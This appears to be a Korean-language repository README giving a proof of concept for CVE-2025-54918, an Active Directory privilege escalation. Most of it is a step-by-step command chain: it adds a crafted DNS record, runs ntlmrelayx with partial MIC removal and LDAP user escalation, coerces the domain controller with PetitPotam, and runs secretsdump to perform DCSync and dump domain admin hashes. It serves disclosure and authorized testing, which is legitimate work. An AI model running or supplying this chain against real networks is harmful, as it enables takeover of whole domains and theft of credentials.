
CVE-2025-54918에 대한 POC 및 기술 시연.
중요:
CVE-2025-54918을 테스트하려면 대상 Active Directory 환경에 DNS 레코드를 생성해야 합니다.
테스트 전에 항상 클라이언트와 상의하고 명시적 승인을 받으십시오. 이는 프로덕션 환경에서 DNS 및 인증 동작에 영향을 줄 수 있습니다.
이 저장소는 낮은 권한의 도메인 사용자가 NTLM 리플렉션과 인증 강제(coercion)를 결합하여 남용함으로써 도메인 관리자 수준의 액세스로 권한을 상승시키는 방법을 보여주는 **기술적 개념 증명(PoC)**입니다.
참고: 이 CVE는 도메인 컨트롤러의 기본값인 서명(signing)이 True로 설정된 경우에도 악용 가능합니다. 또한 CVE-2025–54918 수정은 Windows 2025용이었으며, CVE-2025–33073은 Windows 2022용으로 (의도치 않게) 수정되었습니다.
보다 기술적인 분석은 제 Medium 페이지에서 확인할 수 있습니다: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1
192.168.140.150 (서명(Signing)이 True이며 이는 도메인 컨트롤러의 기본값입니다)192.168.140.135nahya.localtest 유효한 도메인 사용자 (DCSync 권한 없음)필요한 저장소를 클론합니다:
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git
악용 전에 사용자가 DCSync를 수행할 수 없는지 확인합니다:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

공격자 IP로 해석되는 NetBIOS 이름 + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA를 사용하여 DNS 레코드를 생성합니다.
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
dc.nahya.local -a add \
-r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
-d '192.168.140.135' -dns-ip 192.168.140.150

부분 MIC 제거 및 LDAP 권한 상승을 활성화한 상태로 ntlmrelayx를 실행합니다:
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC --escalate-user USERNAME --no-validate-privs

강제(coercion) 기법(PetitPotam)을 사용하여 도메인 컨트롤러가 공격자가 제어하는 DNS 레코드로 인증하도록 강제합니다:
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

권한 상승을 확인하기 위해 secretsdump를 다시 실행합니다:
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
✅ 예상 결과: DCSync 성공 및 도메인 관리자 해시 획득

이 시점에서 공격자는 다음을 수행했습니다:
취약점과 공격 체인에 대한 자세한 설명은 Medium 문서를 참조하십시오.
이 작업은 다음 분들의 도움 없이는 불가능했습니다:
impacket-partial-mic 구현NTLM 및 LDAP 인증 우회 취약점 분석 – CrowdStrike 블로그
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/
Microsoft 보안 공지 – CVE-2025-54918 – MSRC 업데이트 가이드
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918
이 개념 증명(PoC)은 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.